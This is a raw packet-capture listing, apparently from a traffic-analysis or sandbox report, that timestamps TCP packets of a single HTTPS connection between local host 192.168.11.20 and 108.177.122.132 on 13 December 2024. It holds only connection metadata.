                                                Dec 13, 2024 08:50:39.179936886 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.187735081 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.187968016 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.188004017 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.188189983 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.195971966 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.196141958 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.196177959 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.196342945 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.204282999 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.204459906 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.204497099 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.204777002 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.214865923 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.215044022 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.215060949 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.215233088 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.219387054 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.219563007 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.219572067 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.219728947 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.225747108 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.226068020 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.226079941 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.226219893 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.232127905 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.232595921 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.232633114 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.232983112 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.237773895 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.238051891 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.238069057 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.238279104 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.243546963 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.243864059 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.243884087 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.244148016 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.249444008 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.249655962 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.249696016 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.249865055 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.255219936 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.255494118 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.255533934 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.255714893 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.261007071 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.261213064 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.261251926 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.261459112 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.266820908 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.267024040 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.267066002 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.267250061 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.272531986 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.272722006 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.272758007 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.272975922 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.278315067 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.278579950 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.278620005 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.278888941 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.284058094 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.284281015 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.284322977 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.284486055 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.289855957 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.290080070 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.290118933 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.290328026 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.295358896 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.295557976 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.295595884 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.295793056 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.300887108 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.301095009 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.301136971 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.301393986 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.306116104 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.306341887 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.306380987 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.306607962 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.311209917 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.311534882 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.311570883 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.311849117 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.316267967 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.316467047 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.316508055 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.316751957 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.321202040 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.321413040 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.321449995 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.321676016 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.326172113 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.326443911 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.326479912 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.326708078 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.331021070 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.331243992 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.331279993 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.331531048 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.335822105 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.336105108 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.336141109 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.336384058 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.340671062 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.340861082 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.340900898 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.341082096 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.343508959 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.343842030 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.343882084 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.344126940 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.346453905 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.346724033 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.346760035 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.346978903 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.349284887 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.349524975 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.349564075 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.349809885 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.352138042 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.352353096 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.352392912 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.352561951 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.354890108 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.355099916 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.355135918 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.355331898 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.357805014 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.357989073 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.358025074 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.358175039 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.360656977 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.360847950 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.360886097 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.361068964 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.363431931 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.363625050 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.363661051 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.363862991 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.366113901 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.366357088 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.366393089 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.366678953 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.368927956 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.369200945 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.369236946 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.369453907 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.371670008 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.371891975 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.371928930 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.372133017 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.374485016 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.374666929 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.374703884 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.374867916 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.377166986 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.377399921 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.377435923 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.377610922 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.379903078 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.380112886 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.380148888 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.380322933 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.382594109 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.382766008 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.382848978 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.383147001 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.385205984 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.385493040 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.385529041 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.385796070 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.387933969 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.388133049 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.388169050 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.388348103 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.390528917 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.390746117 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.390783072 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.390929937 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.393104076 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.393296957 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.393333912 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.393527985 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.395661116 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.395862103 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.395900011 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.396142006 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.398248911 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.398401976 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.398438931 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.398684025 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.400729895 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.400922060 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.400958061 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.401200056 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.403292894 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.403491020 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.403527021 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.403736115 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.405829906 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.406050920 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.406086922 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.406323910 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.408261061 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.408524036 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.408561945 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.408790112 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.410727978 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.410959005 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.411000013 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.411207914 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.413199902 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.413419962 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.413458109 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.413727999 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.415652990 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.415982008 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.416019917 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.416201115 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.418067932 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.418271065 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.418308020 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.418528080 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.420424938 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.420633078 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.420669079 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.420823097 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.422837973 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.423041105 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.423089027 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.423285007 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.425143957 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.425357103 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.425395012 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.425610065 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.427615881 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.427839041 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.427875996 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.428049088 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.429881096 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.430185080 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.430228949 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.430412054 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.435832977 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.435986042 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.436016083 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.436058044 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.436203957 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.436203957 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.436249018 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.436419010 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.436670065 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.436863899 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.436902046 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.437086105 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.438878059 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.439071894 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.439110041 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.439302921 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.441040039 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.441284895 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.441320896 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.441499949 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.443203926 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.443461895 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.443499088 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.443710089 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.445346117 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.445565939 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.445605993 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.445913076 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.447550058 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.447782993 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.447819948 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.448102951 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.450210094 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.450407982 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.450443983 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.450642109 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.454991102 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.455224991 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.455261946 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.455491066 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.455971003 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.456178904 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.456216097 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.456423044 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.457978010 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.458257914 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.458295107 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.458558083 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.460735083 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.460912943 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.460952997 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.461154938 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.461173058 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.461358070 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.461930037 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.462244987 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.462281942 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.462449074 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.463771105 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.463975906 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.464776039 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.464991093 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.465027094 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.465218067 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.466706991 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.466917038 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.466953993 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.467138052 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.468549013 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.468760967 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.468797922 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.468936920 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.470408916 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.470599890 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.470635891 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.470959902 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.472186089 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.472347021 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.472383022 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.472573042 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.474020958 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.474225998 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.474263906 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.474450111 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.475805044 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.476027966 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.476063967 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.476222038 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.477574110 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.477751017 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.477787971 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.477938890 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.479199886 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.479387045 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.479398012 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.479595900 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.480869055 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.481096029 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.481111050 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.481268883 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.482625008 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.482887983 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.482898951 CET44349715108.177.122.132192.168.11.20
